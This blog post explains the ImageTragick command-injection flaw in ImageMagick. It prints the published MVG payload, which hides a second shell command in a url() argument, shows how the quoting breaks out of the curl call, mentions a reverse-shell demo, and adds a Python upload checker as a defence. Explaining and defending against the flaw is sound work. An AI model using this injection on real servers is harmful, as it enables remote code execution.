ImageMagick Proof Of Concept – Remote Shell

Background

ImageMagick is a very widely used server-side image processing engine. Its common jobs include compressing and resizing user-submitted images (such as profile pictures) so that the files stored by the server have a standard size and format. Many popular image processing plugins for PHP, Ruby's RMagick, and other frameworks are wrappers around ImageMagick.

Important: for guidance on securing systems that use ImageMagick, see the post "Clearing Up Some Misconceptions Around ImageMagick".

Understanding the Vulnerability

The core vulnerability stems from insufficient filtering of file contents, which enables remote code execution. A particularly concerning default behavior amounts to: "If I don't understand 'file.format', try to process it as a .svg or .mvg". These vector graphic formats can include references to remote files, and how those references are processed is determined by the delegates.xml and policy.xml configuration files.

How the Exploit Works

The vulnerability lies in how these remote file references are parsed and handed off. ImageMagick fetches them by building a curl/wget command line from the reference, and the parsing allows an attacker to use an alternative quotation mark to terminate the wget/curl argument and append commands of their own.

Basic ImageMagick Operation

For example, ImageMagick typically processes image conversions using commands like:

convert inputfile.png outputfile.jpg

The Vulnerability

The exploit works by uploading a file named 'inputfile.png' that actually contains MVG[1] text. Here is the sample exploit code published with ImageTragick:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context

Technical Deep Dive

This exploit works because:

  1. The file can be created in any text editor and simply renamed to .png.
  2. When ImageMagick fails to process it as a PNG, it tries the other formats permitted by policy.xml.
  3. Once the file is processed as MVG, its text commands are executed.
  4. The 'fill' command's 'url' function hands its argument to curl.

Command Breakdown

The exploit string:

url(https://example.com/image.jpg";|ls "-la)

can be broken into these components:

curl https://example.com/image.jpg  # Initial intended command
ls -la                             # Injected command

Understanding the Quote Manipulation

The exploit relies on how ImageMagick assembles the curl command around the URL it was given:

  1. Initial structure: curl "
  2. Intended completion: curl "your.url.here"
  3. Exploit structure: curl "https://example.com/image.jpg" ; ls -la"
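The two properties the deep dive and the command breakdown above describe, a text file renamed to .png and a url() argument that carries quotes and shell metacharacters, are both cheap to check before a file ever reaches ImageMagick. The following is an added example written for this post, not code from ImageTragick or ImageMagick: a small upload inspector that verifies magic bytes against the declared extension, flags MVG/SVG text content, and flags url() references containing characters a plain URL never needs. The function name, allow-list and sample inputs are assumptions made for the example.

```python
import re

# Magic bytes for the raster formats an upload form typically accepts.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Text markers of ImageMagick's MVG and SVG coders, the formats a renamed
# "image" may really contain (compared case-insensitively below).
VECTOR_MARKERS = (b"push graphic-context", b"viewbox", b"<svg", b"<?xml")

# A url() argument that carries a quote or shell metacharacter is the shape
# of the delegate injection described above; a plain URL never needs them.
SUSPICIOUS_URL = re.compile(rb"""url\(\s*['"]?[^)]*['"`;|&$]""")


def inspect_upload(data: bytes, declared_ext: str) -> list:
    """Return findings for an uploaded file; an empty list means it passed."""
    findings = []
    ext = declared_ext.lower().lstrip(".")
    expected = MAGIC.get(ext)
    if expected is None:
        findings.append(f"extension .{ext} is not on the allow-list")
    elif not data.startswith(expected):
        findings.append(f"magic bytes do not match declared .{ext}")
    head = data[:4096].lower()
    if any(marker in head for marker in VECTOR_MARKERS):
        findings.append("content looks like a vector/script format (MVG or SVG)")
    if SUSPICIOUS_URL.search(data):
        findings.append("url() reference contains quote or shell metacharacters")
    return findings


# Constructed samples: the ImageTragick payload from the post renamed to
# .png, and the leading bytes of a genuine PNG file.
MVG_PAYLOAD = (b"push graphic-context\n"
               b"viewbox 0 0 640 480\n"
               b"fill 'url(https://example.com/image.jpg\";|ls \"-la)'\n"
               b"pop graphic-context\n")
REAL_PNG_HEAD = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"

if __name__ == "__main__":
    for name, blob in (("payload.png", MVG_PAYLOAD), ("real.png", REAL_PNG_HEAD)):
        print(name, inspect_upload(blob, "png") or ["clean"])
```

Rejecting a file on the magic-byte mismatch alone is enough to stop this particular trick; the other two checks are there so the rejection reason shows up clearly in logs.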

Proof of Concept

I created a proof of concept that establishes a reverse shell to a remote host:

[Figure: Remote Shell Proof of Concept]

Please feel free to leave any questions, comments, or corrections in the comments section below!

Footnotes

1 MVG (Magick Vector Graphics) is ImageMagick's native vector graphics format.